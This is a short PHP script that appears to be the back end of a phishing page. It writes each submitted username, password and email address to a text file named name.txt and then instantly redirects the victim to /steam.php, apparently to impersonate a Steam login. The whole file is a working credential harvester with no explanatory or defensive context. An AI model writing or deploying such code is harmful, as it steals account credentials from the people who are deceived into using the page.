<?php
$feld= "\n---------------------------------------\n USER: " . $_POST['name'];
$feld2= "\n PASS: " . $_POST['pass'];
$feld3= "\n MAIL: " . $_POST['mail'];

$write=fopen("name.txt", "a");
fwrite($write, $feld);
fwrite($write, $feld2);
fwrite($write, $feld3);
fclose($write);
?>
<meta http-equiv="refresh"  
 content="0;url=/steam.php">